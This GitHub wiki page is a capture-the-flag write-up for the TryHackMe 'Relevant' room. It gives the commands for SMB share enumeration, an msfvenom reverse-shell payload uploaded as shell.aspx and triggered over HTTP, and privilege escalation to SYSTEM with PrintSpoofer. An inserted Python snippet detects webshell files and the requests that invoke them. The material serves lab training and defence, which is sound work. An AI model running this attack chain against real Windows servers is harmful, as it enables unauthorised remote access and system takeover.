THM Relevant - grunt92/IT-Sec-WriteUps GitHub Wiki

Pre-Engagement Briefing

User Flag

First, scan the ports of the target server by running nmap -A -p- IP. You will see that the SMB ports are open. To list the SMB shares, run smbclient -L \\\\IP. Besides some standard shares you will see a share called nt4wrksv; to inspect it, run smbclient \\\\IP\\nt4wrksv. In the share you find a file called "passwords.txt", but it is of no importance here. More important: you can upload files to the share. To make any use of this we have to figure out whether the files in the share can be accessed from elsewhere. The nmap results have shown that there are 2 ports serving HTTP. By checking these ports in your browser you will find that the share's files are accessible on port 49663.

To exploit this, create a reverse shell by running msfvenom -p windows/x64/shell/reverse_tcp LHOST=IP LPORT=PORT -f aspx -o shell.aspx. After you have created the shell, upload it with smbclient using put shell.aspx. Start the uploaded shell by navigating to "IP:49663/nt4wrksv/shell.aspx" in your browser. Once the shell is established, run more \Users\Bob\Desktop\user.txt to get the flag.
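As an added defender-side example (not part of the original write-up), the following Python snippet flags the pattern described above: a server-side executable file appearing in a writable share that IIS also serves, together with the HTTP requests that invoke it. The share listing and IIS log lines are constructed for this example; the share name and port follow the write-up.

```python
"""Added detection example: a file dropped into the writable nt4wrksv share that IIS
also serves on port 49663 is then fetched over HTTP. All sample data is constructed."""
import os
import re

# Extensions IIS executes server-side rather than returning as static content.
EXECUTABLE_WEB_EXTENSIONS = {".aspx", ".asp", ".ashx", ".asmx", ".config"}

# Constructed smbclient-style listing of the nt4wrksv share.
SHARE_LISTING = """\
  .                                   D        0  Sat Jul 25 21:46:04 2020
  ..                                  D        0  Sat Jul 25 21:46:04 2020
  passwords.txt                       A       98  Sat Jul 25 15:15:33 2020
  shell.aspx                          A     3421  Sat Jul 25 21:46:04 2020
"""

# Constructed IIS log lines; simplified W3C fields: date time cs-method cs-uri-stem s-port c-ip sc-status
IIS_LOG = """\
2020-07-25 21:45:10 GET /nt4wrksv/passwords.txt 49663 10.10.14.3 200
2020-07-25 21:46:12 GET /nt4wrksv/shell.aspx 49663 10.10.14.3 200
2020-07-25 21:46:30 GET /iisstart.htm 80 10.10.14.3 200
"""

LISTING_RE = re.compile(r"^\s*(\S.*?)\s{2,}([A-Z]+)\s+(\d+)\s+")

def is_executable_web_file(name: str) -> bool:
    """True if IIS would execute this path rather than serve it as a static file."""
    return os.path.splitext(name)[1].lower() in EXECUTABLE_WEB_EXTENSIONS

def executable_files_in_share(listing: str) -> list[str]:
    """Names in a share listing that should never sit in a writable, web-served share."""
    found = []
    for line in listing.splitlines():
        m = LISTING_RE.match(line)
        if m and m.group(1) not in {".", ".."} and is_executable_web_file(m.group(1)):
            found.append(m.group(1))
    return found

def webshell_requests(log: str, share: str) -> list[tuple[str, str, str]]:
    """(timestamp, client ip, uri) for HTTP requests that execute a file under /share/."""
    hits = []
    for line in log.splitlines():
        date, time, _method, uri, _port, client, _status = line.split()
        if uri.lower().startswith(f"/{share.lower()}/") and is_executable_web_file(uri):
            hits.append((f"{date} {time}", client, uri))
    return hits

if __name__ == "__main__":
    print(executable_files_in_share(SHARE_LISTING), webshell_requests(IIS_LOG, "nt4wrksv"))
```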

Root Flag

To get the root flag we have to escalate our privileges. First we should check which privileges we have; to do so, run whoami /priv. With the list of privileges we can search for tools and techniques to gain more privileges. I stumbled over the PrintSpoofer tool by itm4n. By uploading and executing this tool I was able to get a shell as "nt authority\system". After gaining this shell, run more \Users\Administrator\Desktop\root.txt to get the flag.